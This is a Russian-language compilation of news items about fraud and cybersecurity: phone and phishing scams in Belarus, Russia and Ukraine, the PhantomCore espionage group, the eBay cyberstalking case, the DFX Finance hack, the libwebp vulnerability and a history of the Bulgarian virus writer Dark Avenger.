Женщина собрала сбережения - $20 тыс., некоторые личные вещи для родственницы в больницу и ожидала дальнейших инструкций.
В это же время на другом конце столицы 17-летний парень получил от кураторов координаты, по которым нужно забрать посылку с деньгами.
За пару дней до заказа юноша искал подработку в Telegram. Школьнику сообщили сразу: работа хорошо оплачивается, однако нужно выступать посредником в отмыве денежных средств. Схема давно известна: забирать деньги по указанным адресам и передавать их другим курьерам. Подростка такая формулировка смутила, и он прекратил общение с неизвестными. Однако переписка через какое-то время возобновилась. Настойчивые собеседники все-таки смогли уговорить парня выполнить несколько заданий.
В назначенное время парень приехал к дому на проспекте Рокоссовского и забрал посылку. Далее в соседнем дворе он пересчитал деньги и ожидал другого посредника, чтобы передать валюту. Однако радовался школьник всего три дня. В ходе оперативно-разыскных мероприятий сотрудники милиции задержали курьера телефонных мошенников.
Как оказалось, мошенники звонили минчанке в мессенджер с иностранных номеров. Кроме того, ее атаковали звонками на стационарный телефон, убеждая в реальности происходящего.
В отношении подростка Ленинским (г. Минска) районным отделом Следственного комитета возбуждено уголовное дело по ч. 4 ст. 209 Уголовного кодекса (мошенничество, совершенное в особо крупном размере). К нему применена мера пресечения в виде отдачи несовершеннолетнего под присмотр. В данный момент правоохранителями устанавливаются все лица, причастные к совершению преступления. Причиненный ущерб возмещен в полном объеме.
Расследование уголовного дела продолжается.
В прицеле Facct новая кибершпионская АРТ PhantomCore, которая атакует российские компании начиная с января 2024 года. Группа отслеживается под таким названием из-за одноименного уникального, ранее не документированного, трояна удаленного доступа PhantomRAT. В качестве первоначального вектора атаки PhantomCore на российские компании выступают фишинговые письма с защищенным паролем RAR-архивом (сам пароль содержится в теле письма). Причем атакующие эксплуатируют в архивах ранее не описанную вариацию уязвимости WinRAR — CVE-2023-38831, в которой вместо ZIP-архивов используются RAR. Сами архивы содержат PDF-документ и одноименную директорию, в которой располагается исполняемый файл. После попытки открытия PDF-документа, вместо него запускается вредоносный исполняемый файл. Финальной обнаруженной стадией является троян удаленного доступа PhantomRAT, который после доставки и запуска на ПК отправляет запросы к С2 для получения команд. PhantomRAT – это троян, основанный на .NET., реализующий функционал: загрузку файлов с C2-сервера, выгрузку файлов со скомпрометированного хоста на C2-сервер, а также выполнение команд в интерпретаторе командной строки cmd.exe. Данный троян использует протокол RSocket для коммуникации с C2. Кроме того, группа использует .NET- приложения, с опцией развертывания одним файлом (single-file deployment), для затруднения обнаружения на зараженной системе. В данном типе приложений, .NET- библиотеки (модули), содержатся в теле файла, в сериализованном виде. Несмотря на то, что на текущий момент мотивация атак окончательно не установлена, судя по виктимологии и форматам рассылок, вероятнее всего, речь идет о кибершпионаже. При этом один из файлов для тестирования сборки PhantomRAT был впервые загружен на VirusTotal 26 февраля 2024 года из Киева, а еще два тестовых образца уникального вредоносного ПО - из Украины. Подробности о первых атаках новой группы PhantomCore, а также индикаторы компрометации приведены в блоге.
Злоумышленник получал доступ к счетам людей, заманивая их на сайт-двойник государственного учреждения. Полицейские сообщили правонарушителю о подозрении в мошенничестве. За содеянное ему грозит лишением свободы.
Разоблачили мужчину сотрудники управления противодействия киберпреступлениям в Одесской области Департамента киберполиции НПУ совместно с работниками следственного управления ГУНП в Одесской области.
Полицейские установили, что житель Одессы создал и разместил в популярных социальных сетях ссылку на сайт, внешний вид которого полностью копировал дизайн сайта Государственной помощи в рамках программы «еПоддержка». С переходом граждан по ссылке с фишинговыми формами за денежную помощь от государства злоумышленник получал реквизиты их платежных карт: номер, СVV код, срок действия и другие.
В дальнейшем, имея всю необходимую информацию, правонарушитель осуществлял несанкционированное вмешательство в интернет-банкинг и транзакции с банковских счетов потерпевших.
Таким образом злоумышленник с июля по сентябрь 2023 года обманул двух женщин и двух мужчин. В целом потерпевшим он нанес материальный ущерб на сумму почти 16 тысяч гривен.
В ходе проведения санкционированных обысков по месту жительства правонарушителя полицейские изъяли мобильные телефоны, компьютерную технику и другие вещественные доказательства противоправной деятельности мужчины.
Полицейские задержали фигуранта в порядке ст. 208 Уголовно-процессуального кодекса Украины и сообщили ему о подозрении по ч. 4 ст. 190 Уголовного кодекса Украины, а именно в завладении чужим имуществом путем обмана, то есть мошенничестве, совершенном путем незаконных операций с использованием электронно-вычислительной техники, повторно. Это преступление наказывается лишением свободы на срок от трех до восьми лет.
Суд избрал подозреваемому меру пресечения в виде содержания под стражей с возможностью внесения залога в размере 211 тыс. грн.
Следствие продолжается под процессуальным руководством Одесской областной прокуратуры. Правоохранители устанавливают полный круг лиц, которые могли пострадать от противоправных действий злоумышленника.
Сотрудники eBay сядут в тюрьму за покушение на жизнь клиентов, критиковавших компанию.
eBay выплатит штраф $3 млн. для урегулирования уголовных обвинений в том, что служба безопасности компании преследовала пару из Массачусетса за критику платформы на своем сайте.
По соглашению об отсрочке судебного преследования eBay признает ответственность за действия шести своих бывших сотрудников и подрядчика, каждый из которых ранее признал себя виновным в физическом преследовании и киберпреследовании Ины и Дэвида Штайнеров.
В 1999 году Штайнеры стали соучредителями EcommerceBytes, информационного портала, который сообщает и тщательно изучает компании электронной коммерции (E-Commerce), включая eBay. Некоторые руководители eBay были недовольны таким освещением событий и решили оказывать давление на Штайнеров, чтобы заглушить критику.
Впоследствии Министерство юстиции США предъявило eBay:
2 пункта обвинения в преследовании при пересечении границ штатов;
2 пункта обвинения в преследовании через службы электронных коммуникаций;
1 пункт обвинения в подкупе свидетелей;
1 пункт обвинения в препятствовании осуществлению правосудия.Click to expand...
В дополнение к выплате штрафа в размере $3 млн., который является установленным законом максимальным штрафом за 6 уголовных преступлений, eBay также будет обязан сохранить в течение 3-ёх лет независимого корпоративного наблюдателя за соблюдением требований и внести улучшения в свою программу обеспечения соответствия. Тем временем Штайнеры в частном порядке подают в суд на eBay о возмещении ущерба, и этот процесс продолжается до сих пор.
Начиная с августа 2019 года бывший главный директор по безопасности eBay, и 6 его коллег преследовали Штайнеров за их освещение eBay. 7 сотрудников неоднократно писали Штайнерам сообщения с угрозами в X*, доставляли различные пугающие предметы в дом Штайнеров и физически наблюдали за парой.
В число отправленных Штайнерам предметов входили:
книга о том, как выжить после смерти супруга;
подписки на порно;
окровавленная маска свиньи;
эмбрион поросенка;
похоронный венок;
живые пауки и тараканы.Click to expand...
По данным прокуратуры, бывшие сотрудники eBay также отправились в Натик, штат Массачусетс, чтобы наблюдать за своими жертвами, установили на их машину GPS- устройство для слежения, а также разместили в интернете объявление о поиске сексуальных партнеров и указали домашний адрес Штайнеров.
После того, как Штайнеры вызвали полицию, главный директор дал ложные показания полиции и следователям. Он и его команда также удалили цифровые доказательства, связанные с кампанией киберпреследования, и фальсифицировали записи.
Шесть сотрудников eBay вместе со своим руководителем были осуждены за участие в преступлениях:
директор получил 4 года и 9 месяцев тюремного заключения;
первый сотрудник был приговорен к 2 годам тюрьмы;
второй сотрудник получил 1 год тюремного заключения;
третий сотрудник получил 1,5 года тюремного заключения и 1 год домашнего ареста;
еще 2 сотрудника получили по 1 году домашнего ареста;
шестой сотрудник ожидает приговора.Click to expand...
Генеральный директор eBay Джейми Янноне (с 2020 года) отметил, что поведение компании в 2019 году было неправильным и предосудительным. С того момента, как eBay впервые узнал о событиях 2019 года, компания активно сотрудничала с правоохранительными органами. Янноне подчеркнул, что eBay продолжает приносить «глубочайшие извинения» Штайнерам за то, что им пришлось пережить.
sc:
regmedia.co.uk/2024/01/11/ebay_deferred_prosecution_agreement.pdf
regmedia.co.uk/2024/01/11/usa_v_ebay_information.pdf
ebayinc.com/stories/news/ebay-agreement-us-attorney-office-mass/
В отдел полиции «Южный» УМВД России по г. Кемерово обратился 51-летний местный
житель, работающий преподавателем по кибербезопасности
одного из технических вузов. Он сообщил, что неизвестные обманным способом
похитили у него крупную сумму денежных средств.
Полицейские выяснили, что потерпевшему позвонил мужчина, который представился сотрудником правоохранительных органов. Он сообщил, будто в учебном заведении, работником которого тот является, злоумышленники продают мошенникам персональные данные преподавателей.
Вскоре горожанину позвонила якобы специалист банка, которая пояснила, что кемеровчанину следует «понизить кредитный потенциал», чтобы информацией не могли воспользоваться злоумышленники - для этого нужно взять несколько займов в различных банках, после чего перевести денежные средства на «безопасный» счет.
В течение четырех дней потерпевший оформил 4 кредита, а также продал свой автомобиль «Рено Логан». Собранные денежные средства в размере около 4 млн рублей он 20 переводами перечислил на указанные счета. Только после этого потерпевший осознал, что стал жертвой аферистов, и обратился в полицию.
Сейчас сотрудники уголовного розыска устанавливают подозреваемых. Следователем отдела полиции «Южный» УМВД России по г. Кемерово возбуждено уголовное дело по признакам преступления, предусмотренного ч. 4 ст. 159 УК РФ «Мошенничество», которая предусматривает до 10 лет лишения свободы.
• Source: https://t.me/gumvd42/4303
Правоохранительные органы Румынии провели десятки обысков у криптотрейдеров, подозреваемых в сокрытии доходов от операций с криптовалютами и уклонении от уплаты налогов.
По словам Кристиана Романа (Cristian Roman), партнера юридической фирмы Iordăchescu & Asociații, знакомого с ситуацией, полицейские рейды проводились в румынской столице Бухарест, а также в уездах Дымбовица, Илфов и Олт. Они были совершены в конце 2022 года в рамках более раннего расследования, в ходе которого выяснилось, что криптовалютные трейдеры не сообщили в налоговую службу о цифровых активах на сумму более $50 млн.
Ссылаясь на данные, предоставленные румынской полицией, адвокат отметил, что в период с 2019 по 2022 годы 19 физических лиц уклонялись от уплаты налогов от доходов, полученных от операций с цифровыми активами. По предварительным оценкам следователей, из-за их действий государственный бюджет недополучил 3 млн румынских леев (около $650 000).
Прошлым летом Национальное агентство налогового управления Румынии (ANAF) начало расследование в отношении криптотрейдеров, получавших доход от торговли криптовалютами в период с 2016 по 2021 годы. Трейдеры пользовались торговыми площадками Binance, Kucoin, Maiar, Bitmart и FTX. Налоговые инспекторы выяснили, что около 63 граждан Румынии не указали в налоговых декларациях криптоактивы на общую сумму 48 млн евро.
Согласно поправкам к Налоговому кодексу Румынии, принятым в 2019 году, местные трейдеры обязаны платить 10% подоходный налог с прибыли от криптовалютных операций, превышающих 600 румынских леев в год (около $130).
Ориентированная на стейблкоины децентрализованная биржа DFX Finance на базе Ethereum потеряла в результате атаки цифровые активы стоимостью примерно $7,5 млн.
It seems @DFXFinance's DEX pool (named Curve) is hacked (w/ loss of 3000 ETH or $~4M) due to the lack of proper reentrancy protection. Here comes an example tx: https://t.co/tB6Q0SIBSA. The stolen funds are being deposited into @TornadoCash pic.twitter.com/6ft7HYpwpq
— PeckShield Inc. (@peckshield) November 10, 2022Click to expand...
Эксперты PeckShield отметили, что взлом стал возможен из-за «отсутствия надлежащей защиты от повторного входа».
Команда DeFi-протокола подтвердила инцидент:
«Нас уведомили о подозрительной активности через 20-30 минут после первой транзакции, и мы приостановили все смарт-контракты DFX в течение нескольких минут после подтверждения атаки», — заявили разработчики.
- Today we were notified about suspicious activity happening in the #DFX contracts. The attack started at Nov-10-2022 07:21:59 PM +UTC originating from wallet 0x14c19962e4a899f29b3dd9ff52ebfb5e4cb9a067.
— DFX Finance (@DFXFinance) November 11, 2022Click to expand...
По данным специалистов BlockSec, злоумышленник воспользовался флэш-кредитами для опустошения пулов ликвидности, сообщает The Block. Он конвертировал украденные токены в ETH и вывел криптовалюту стоимостью около $4,3 млн.
Такую же оценку дали в PeckShield, обратив внимание, что хакер отправляет средства в миксер Tornado Cash.
Оставшиеся токены на сумму $3,2 млн перехватил MEV-бот в ходе так называемой «сэндвич-атаки» — опережающей транзакции.
Команда протокола призвала оператора бота связаться через каналы в соцсетях для обсуждения возврата активов.
- We urge the #MEV bot owner to get in contact with us here on Twitter or at our Telegram and Discord.
Polygon pools were not affected as we were able to pause the contracts before the attacker made his way to the polygon side.
— DFX Finance (@DFXFinance) November 11, 2022Click to expand...
На фоне инцидента цена токена DFX Finance (DFX) обвалилась в моменте почти вдвое с уровней около $0,3. После коррекции монета торгуется вблизи $0,18, согласно DEX Screener. Это более чем на 99% ниже максимума, зафиксированного в мае 2021 года (CoinGecko). Рыночная капитализация DFX составляет около $4,18 млн.
Объем заблокированных в смарт-контрактах протокола активов обвалился с $18,6 млн до $3,6 млн, по данным DeFi Llama.
Напомним, на конец октября потери Web3-индустрии в результате эксплойтов с начала года приблизились к $3 млрд, подсчитали в PeckShield.
Федеральное бюро расследований предъявило обвинения в криптовалютном мошенничестве 50-летнему жителю Нью-Йорка Эдди Александру. Об этом говорится в судебных документах.
По данным ФБР, Александр основал и управлял платформой для торговли цифровыми активами EminiFX. Он якобы привлек «сотни индивидуальных инвесторов» и обещал удвоить их вложения в течение пяти месяцев, а также 5% еженедельную прибыль.
Власти утверждают, что обвиняемый не инвестировал большую часть доверенных ему средств. Он переводил деньги на личные счета и потратил около $170 000 на покупку дорогих автомобилей, аренду офиса, маркетинг и наем персонала, заявили в ФБР.
Александр вводил клиентов в заблуждение касательно их инвестиций и заявлял, что средствами управляют «опытные трейдеры» EminiFX. Однако, во что именно они вкладывались, основатель компании не уточнял.
ФБР оценило ущерб от действий Александра в $59 млн. По двум пунктам обвинения ему грозит 10 и 20 лет лишения свободы.
• Source: justice[.]gov/usao-sdny/press-release/file/1505421/download
Специалисты ИБ-компании Elastic Security рассказали о вредоносной кампании, в ходе которой злоумышленники используют цифровые сертификаты для обхода решений безопасности и тайной установки Cobalt Strike и BitRAT на скомпрометированные системы.
Загрузчик вредоносного ПО с незначительным или нулевым обнаружением на VirusTotal получил название Blister. Вектор заражения, использованный для организации атаки, и конечные цели злоумышленников остаются неизвестными.
Как уже упоминалось, отличительной чертой атак является использование действительных цифровых сертификатов, выпущенных удостоверяющим центром Sectigo. Вредоносное ПО подписано с помощью сертификата от 15 сентября 2021 года. По словам исследователей, они обратились к УЦ для того, чтобы он отозвал скомпрометированные сертификаты.
«Зачастую исполняемые файлы, подписанные действительными сертификатами, исследуются в меньшей степени, чем неподписанные исполняемые файлы. Их использование позволяет злоумышленникам оставаться вне поля зрения и уклоняться от обнаружения в течение более длительного периода времени», - сообщили исследователи Джо Десимоне (Joe Desimone) и Самир Буссеаден (Samir Bousseaden).
Blister маскируется под легитимную библиотеку colorui.dll и доставляется на атакуемую систему с помощью дроппера dxpo8umrzrr1w6gm.exe. После выполнения загрузчик на 10 минут переходит в режим ожидания, скорее всего, чтобы обойти анализ песочницы. Затем он получает постоянство на системе и расшифровывает встроенную вредоносную нагрузку Cobalt Strike или BitRAT.
После расшифровки встроенная полезная нагрузка загружается в текущий процесс или внедряется в запущенный процесс WerFault.exe [Windows Error Reporting].
• Source: <https://www.elastic.co/blog/elastic-security-uncovers-blister- malware-campaign>
Прокуратура Южного округа Нью-Йорка выдвинула обвинения в отношении члена семьи Картье и пятерых граждан Колумбии в отмывании полученных от наркотрафика средств через стейблкоин USDT.
По версии властей, фигуранты являлись участниками сети по отмыванию денег, действующей в США и Колумбии. В своей преступной деятельности они использовали систему брокеров и подставных компаний.
Прямой потомок семьи ювелиров Максимилиан де Хуп Картье примерно с января 2020 года управлял нелицензированной внебиржевой платформой для торговли криптовалютами. Операции проводились через группу фиктивных компаний, включая Bullpix Solutions LLC, Vintech Capital LLC, VC Innovated Technologies LLC, AZ Technologies LLC, Softmill LLC и Sun Technologies LLC.
Его подельники Леонардо де Хесус Зуалага Дюке, Эрика Милена Лопес Ортис, Александр Арейса Слос и Адриан Арейса Слос ввезли более 100 кг кокаина в США. Еще одна обвиняемая — Фелипе Эстрада Эчеверри — участвовала в отмывании средств.
В общей сложности с января 2020 по настоящее время OTC-платформа Картье осуществила «незаконные транзакции на сотни миллионов долларов и отмыла сотни миллионов преступных доходов», в том числе $14,5 млн от незаконного оборота наркотиков с мая по ноябрь 2023 года.
Картье обвинили в отмывании денег, банковском мошенничестве, а также в ведении нелицензионного бизнеса по переводу денег. Его арестовали 22 февраля в Майами.
Пятеро граждан Колумбии взяты под стражу местными властями 30 апреля.
Дело передано в суд.
sc: justice[.]gov/usao-sdny/pr/purported-member-cartier-family-and-five- colombian-nationals-charged-their-roles
В январе 2024 года мушине позвонили с неизвестного номера. Женщина на том конце провода представилась сотрудницей известной инвестиционной компании и предложила своему собеседнику «подзаработать» на криптовалюте. Раньше мужчина уже интересовался темой инвестиций и даже пробовал себя в этом деле. Но даже не смотря на прошлый опыт, он не заметил подвоха и согласился. Злоумышленница соединила свою жертву с неким консультантом, который рассказал об основных условиях работы с биржей.
Далее с мужчиной через «скайп» связался «инвест-специалист» и помог установить необходимые для «заработка» приложения. Мошенник объяснил, как работать с программами и предложил вложить первые деньги. Так на фейковой бирже оказалось первые 150 тыс. руб. После успешной сделки пострадавший осмелился оформить кредит на 1,3 млн руб. Вырученные деньги также появились на счёте у аферистов.
Суммы в личном кабинете платформы продолжали расти. Тогда мужчина решил подкрепить успех очередным кредитом и перечислить 700 тыс. руб. Ещё через неделю в ход пошли личные накопления. В несколько «заходов» пострадавший отправил «в никуда» 2,5 млн руб.
Вскоре мужчина осознал, что на протяжении двух недель он общался не с высококлассными инвест-специалистами, а настоящими киберпреступниками. В надежде вернуть похищенные суммы он обратился к правоохранителям. Возбуждено уголовное дело о мошенничестве.
Членов преступной организации разоблачили киберполицейские Львовщины совместно со следственным отделом Львовского районного управления полиции № 2 областного главка под процессуальным руководством Львовской областной прокуратуры, при содействии работников службы безопасности «ПриватБанка».
Правоохранители установили двух организаторов противоправной деятельности, которые привлекли к ней еще шестерых сообщников в возрасте от 20 до 40 лет. Злоумышленники создавали фишинговые ссылки якобы на официальные вебресурсы правительственных органов и банковских учреждений. В дальнейшем такие ссылки распространяли среди пользователей популярных социальных сетей и мессенджеров. Пострадавшим предлагали оформить денежную помощь от Президента Украины, ООН, UNICEF и других организаций.
После ввода гражданами персональных данных на фишинговых вебсайтах мошенники получали доступ к их учетным записям в онлайн-банкинге. Фигуранты также заменяли финансовые номера телефонов на подконтрольные. В указанный способ правонарушители завладевали средствами потерпевших, которые «выводили» с помощью платежных сервисов и тратили на собственные нужды.
В ходе досудебного расследования доказано, что указанным способом члены преступной организации успели нанести более 700 тысяч гривен ущерба.
Правоохранители провели 14 обысков при силовой поддержке спецназовцев КОРД и БПОП ГУНП во Львовской области в местах проживания и в автомобилях фигурантов. Изъята компьютерная техника, накопители данных, мобильные телефоны, банковские и сим-карты, деньги на общую сумму почти 400 тысяч гривен, автомобили, а также огнестрельное оружие и психотропные вещества.
Злоумышленников задержали в порядке ст. 208 Уголовного процессуального кодекса Украины и объявили подозрения. Действия фигурантов квалифицированы, в зависимости от участия в преступной деятельности, по нескольким статьям Уголовного кодекса:
- ч. 4 ст. 190 (Мошенничество);
- ч.ч. 1, 2 ст. 255 (Создание, руководство преступным сообществом или преступной организацией, а также участие в ней);
- ч. 5 ст. 361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно- коммуникационных систем, электронных коммуникационных сетей).
Шестерым правонарушителям избрана мера пресечения - содержание под стражей без права внесения залога, еще двум их сообщникам - содержание под стражей с правом внесения залога.
Сейчас обвинительный акт в отношении восьми членов преступной организации направлен в суд. Обвиняемым может грозить до пятнадцати лет лишения свободы.
Компания Google, не делая никаких анонсов, пересмотрела рейтинг уязвимости CVE-2023-4863, связанной с опенсорсной библиотекой libwebp. Теперь, как и предупреждали ИБ-эксперты, эта проблема, затрагивающая тысячи приложений, оценивается как критическая (10 баллов из 10 возможных по шкале CVSS) и имеет собственный идентификатор CVE — CVE-2023-5129.
Напомним, что изначально компания раскрыла данные об этой уязвимости в Chrome, присвоив ей идентификатор CVE-2023-4863, но не упоминала о ее связи с библиотекой libwebp, разработанной внутри самой Google для обработки изображений WebP.
Вскоре об устранении этой же проблемы отчитались эксперты Apple Security Engineering and Architecture (SEAR) и компании Citizen Lab (здесь баг отслеживался как CVE-2023-41064), а также разработчики Mozilla Firefox (CVE-2023-4863). Стало понятно, что речь идет об одной и той же уязвимости, которую компании исправляют порознь, и о скоординированном раскрытии информации речи явно не идет.
Специалисты Citizen Lab и вовсе
[заявляли](https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-
click-zero-day-exploit-captured-in-the-wild/), что проблема CVE-2023-41064
применялись злоумышленниками как часть цепочки zero-click эксплоитов для
iMessage, которая получила общее название BLASTPASS.
Происходящее вызвало немалое замешательство в ИБ-сообществе, а у специалистов
по информационной безопасности [возникли
вопросы](https://arstechnica.com/security/2023/09/incomplete-disclosures-by-
apple-and-google-create-huge-blindspot-for-0-day-hunters/) к Google, которая
по неизвестным причинам решила не связывать эту ошибку с libwebp, тем самым
ставя под угрозу тысячи приложений, использующих библиотеку.
Дело в том, что libwebp используется в составе практически каждого приложения, ОС и других библиотек, которые работают с изображениями формата WebP. В первую очередь это относится к фреймворку Electron, который применяется в Chrome и многих других приложениях для декстопных и мобильных устройств. То есть пред багом оказались уязвимы многочисленные проекты, использующие libwebp, включая Microsoft Teams, 1Password, Signal, Safari, Mozilla Firefox, Microsoft Edge, Opera и нативные браузеры для Android и так далее.
В итоге компания подверглась критике со стороны экспертов и СМИ, которые подчеркивали, что умалчивание о проблеме в libwebp приведет к ненужным задержкам в выходе патчей, а злоумышленники, тем временем, будут выполнять вредоносный код, просто показывая пользователям вредоносные изображения WebP.
Как теперь обнаружили журналисты и ИБ-специалисты, на этой неделе компания Google, не привлекая лишнего внимания, внесла изменения в свой бюллетень безопасности, посвященный проблеме CVE-2023-4863.
Так, ранее в компании сообщали, что проблема связана с переполнением буфера хипа WebP в Chrome, а среди затронутых продуктов упоминался только сам браузер Google. Теперь же Google выпустила новое сообщение, в котором представлено более детальное описание уязвимости, и проблеме присвоен новый идентификатор CVE-2023-5129.
В новой записи наконец упомянута затронутая проблемой библиотека libwebp, а рейтинг уязвимости повышен до максимального — 10 баллов из 10 возможных (против 8,8 балла, ранее присвоенных CVE-2023-4863).
Как объясняется теперь, баг связан с алгоритмом Хаффмана, который используется libwebp для lossless сжатия, и позволяет злоумышленникам выполнять out-of- bounds запись с использованием вредоносных HTML-страниц.
В 80-е годы социалистическая Болгария сумела сделать впечатляющий рывок в
компьютеризации, о чём мы рассказали в недавней статье. В стране производились
десятки тысяч компьютеров в год: под маркой «Правец» под Софией наладили
производство ПК, недвусмысленно напоминавших Apple II и IBM PC с процессорами
Intel 8088 и 8086. Некоторое время (дело было до массового перевода
производства ПК на Тайвань и в КНР) Болгария даже вышла на третье место по
производству компьютеров на душу населения.
Dark Avenger) — это известный трек ВИА "Manowar" (1982 год) и одновременно
почти первый ранний вариант названия ВИА "Rage" (просто Avenger), ну а про
"Anthrax" и говорить нечего. Помним и любим.
Количество специалистов в области компьютерной техники и программирования
также стремительно росло все восьмидесятые годы. При ДКМС, болгарском
комсомоле, с 1984 года действовали компьютерные клубы для интересующейся
компьютерами молодёжи, к концу десятилетия их число превышало пятьсот, что
тоже способствовало стремительному распространению компьютерной грамотности в
значительно большей степени, чем в любой другой стране соцлагеря. На пике
только число официально зарегистрированных посетителей компьютерных клубов
доходило до полумиллиона в девятимиллионной к концу 80-х стране. Конечно,
официальная государственная статистика — дело творческое, но масштабы
компьютеризации Болгарии впечатляли.
В стране и партии предметно задумывались о превращении Болгарии в локомотив компьютеризации всего социалистического блока. «Болгарские компьютерные клубы» открывались от КНДР и Вьетнама до Эфиопии и Кубы. Производство персональных компьютеров «Правец 8М» по мотивам Apple II с болгарскими доработками в порядке эксперимента наладили в Узбекской ССР, и эксперимент этот был вполне успешен. Болгария «штамповала» компьютерщиков в значительно больших количествах, чем требовала её собственная экономика, в том числе с прицелом на работу по всему «восточному блоку» и примкнувшим к ним развивающимся странам «соцориентации».
Однако на рубеже 80-х и 90-х годов в силу целого комплекса причин социалистический блок рассыпался. Страны, где у власти остались компартии, за небольшими исключениями тоже предпочли в экономике перейти на рельсы рыночного капитализма при активной торговле со странами большого Запада. Болгарское производство компьютеров не выдержало конкуренции с американскими корпорациями и тайваньскими заводами, а также вопросов о причинах загадочного сходства ПК «Правец» с Apple и IBM — и в 1994 году завод под Софией закрылся.

Болгария, как и другие постсоциалистические страны, столкнулась с тяжёлым кризисом перехода от внутриблоковой плановой экономики к рыночной, открытой глобальным ветрам. Полноценная массовая компьютеризация ещё только начиналась даже в самых богатых и развитых странах Запада. Когда вместо государственной занятости появился рынок труда — предложение специалистов в области IT многократно превысило спрос работодателей. Ну а писать и продавать программы в стране, где свободное распространение пиратского софта почиталось за норму и естественное право, было так же сложно, как в первые годы постсоветской России.
Множество болгарских компьютерщиков остались не у дел, не говоря уже о недавних выпускниках компьютерных специальностей. Кто-то со скрипом зубовным сменил специальность — нередко чтобы потом вернуться на волне насыщения страны и её экономики компьютерами со второй половины 90-х. Кто-то эмигрировал в страны Западной Европы или за океан, где спрос на компьютерщиков уже стремительно рос.
А кто-то остался в Болгарии, сумев остаться в изрядно поредевшей IT-сфере, но нередко затаив зуб на «буржуинов» и проникшись идеями киберпанка про бунт против системы и всю эту нашу high tech low life — благо «лоу лайфа» в постсоциалистической Болгарии хватало за глаза. Во многом эта среда и породила феномен болгарских авторов вирусов, которые в начале 90-х гремели на весь мир и устрашали Европу и Америку.
Однако самый знаменитый её представитель, великий и ужасный Dark Avenger, начал писать вирусы до того, как в Болгарии в конце 1989 года произошли радикальные социальные, политические и экономические перемены. Видимо, ему это просто нравилось — до того, как вирусописание стало для болгарских программистов мейнстримом.
Всё началось с того, что в апреле 1988 года в официальном компьютерном журнале «Компютър за Вас» вышла статья про компьютерные вирусы. Авторы не столько ужасались «порочному буржуазному явлению», сколько увлекательно описывали, как работают вирусы, как они распространяются, и даже как их можно совершенствовать.
Осенью того же года болгарские компьютеры «зацепило» распространение вируса Cascade, который не делал ничего особенно свирепого — но эффектно и внезапно для пользователя «осыпал» буквы на экране под музыку. Как считается, этот пришедший с немецко- швейцарской границы шуточный вирус почти одновременно вдохновил Dark Avenger на написание куда более опасных вирусов, а компанию IBM и Евгения Касперского — на создание антивирусов.
Именно осенью 1988 года человек, который скоро станет известен всему миру как Dark Avenger, и решил попробовать свои силы в новом деле.
Среда для экспериментов была идеальной. В Болгарии было множество тех самых общественных компьютерных клубов при ДКМС, их посещали множество людей. Болгарская версия Перестройки шла уже второй год. Строгость учёта и контроля посетителей на волне роста «перестроечного» пофигизма заметно снизилась, и найти «хвосты» было затруднительно. «Правецы» как аналоги Apple и IBM спокойно работали с массово, почти что с одобрения государства и партии, спираченным западным софтом — и писать вирусы можно было сразу с прицелом на глобальное распространение.
Спустя полгода, весной 1989 года, в Европе и США стали отмечаться случаи заражения новым вирусом. К осени того же года заражения приняли характер эпидемии, достигли Австралии, Таиланда и Монголии, и вызвали серьёзное внимание со стороны специалистов по компьютерной безопасности. Каждый 16-й запуск заражённой машины сопровождался стиранием произвольного сектора на харде и его заполнение однотипными файлами с записью ««Eddie lives… somewhere in time» («Эдди жив… где-то во времени»). В коде вируса имелась всё та же надпись «Eddie lives… somewhere in time», а также гордая подпись «This program was written in the city of Sofia © 1988-89 Dark Avenger»: «эта программа написана в городе Софии, 1988-89, Dark Avenger». По подписи автора он и остался в истории вирусописания.
Вирус Dark Avenger был написан красиво и изобретательно — что делало его особенно опасным. Некоторые использованные в нём механизмы были личными изобретениями автора. В отличие от других вирусов того времени, заражение происходило не только при исполнении поражённых .com и .exe файлов, но и при любых операциях доступа к ним. То есть, любая программа, выполнявшая те или иные обращения к исполняемым файлам, включая не обученные «охотиться» на Dark Avenger антивирусы, вызывала массовое заражение всех .com и .exe файлов длиной более 1775 байт.
Уничтожение не всей информации, до которой можно дотянуться, а отдельных секторов по очереди тоже было весьма коварным ходом: пользователь мог далеко не сразу понять, что с его машиной что-то не так, что давало вирусу больше возможностей для порчи информации и распространения.
Хуже того, Dark Avenger был первым вирусом, способным целенаправленно сопротивляться первым антивирусным программам с поиском по сигнатурам. При старте любой программы вирус помечал программный сегмент как последний и становился «невидимым». По окончании работы программы вирус помечал программный сегмент уже как не последний, и восстанавливал первоначальное значение прерывания, если оно было изменено программой.
В СССР этот вирус появился одним из первых, причём известен он стал под другим названием. Похоже, кто-то из московских программистов поймал и подправил «новинку», и в Москве Dark Avenger вместо фразы про Эдди во времени забивал стёртые сектора файлами с текстом «B O R O D A мстит во времени». Посему его и прозвали «Бородой».
В целом вирус Dark Avenger развивался несколько лет усилиями разных энтузиастов, становясь всё более изощрённым и поражая машины под MS DOS в версиях 3.х и 4.х. Помимо Dark Avenger и Boroda его часто называли Eddie.
Изучавшие вирус специалисты быстро уловили отсылку про Эдди: автор был ценителем тяжёлого рока. Eddie — маскот и символ группы Iron Maiden, похожая на агрессивного неупокоенного фигура с оскаленными зубами и загадочным светом в чёрных глазницах полуобнажённого черепа. Эдди фигурировал на обложках всех альбомов Iron Maiden от художника Дерека Риггса, и был культовым образом у рокеров 80-х.
Ну а Somewhere in Time — название вышедшего в 1986 шестого студийного альбома группы, на обложке которого Эдди красовался в виде злобного киборга на фоне киберпанкового мегаполиса с пирамидами, напоминавшего кадры культового фильма Bladerunner («Бегущий по лезвию»).
За Dark Avenger последовали другие вирусы от того же автора из Софии. Только более или менее подтверждённо ему приписывают целую библиотеку вирусов: Dark Avenger, V2000, V2100, 651, Diamond, Nomenklatura, 512, 800, 1226, Proud, Evil, Phoenix, Anthrax, Leech.
По оценкам экспертов по борьбе с вредоносными программами, его творения отличались инновационностью и необычностью всё более новых и творческих решений по нанесению вреда чужим компьютерам. К примеру, ему принадлежала идея «бинарных» вирусов: Anthrax и v2100 дополняли друг друга и позволяли распространяться и поражать машины даже при интенсивном использовании антивирусных программ. Словацкий специалист по борьбе с вирусами Мирослав Трнка, создатель антивируса ESET NOD32, характеризовал код Dark Avenger как «очень чистый и оптимизированный до последнего такта, похожий на швейцарские часы».
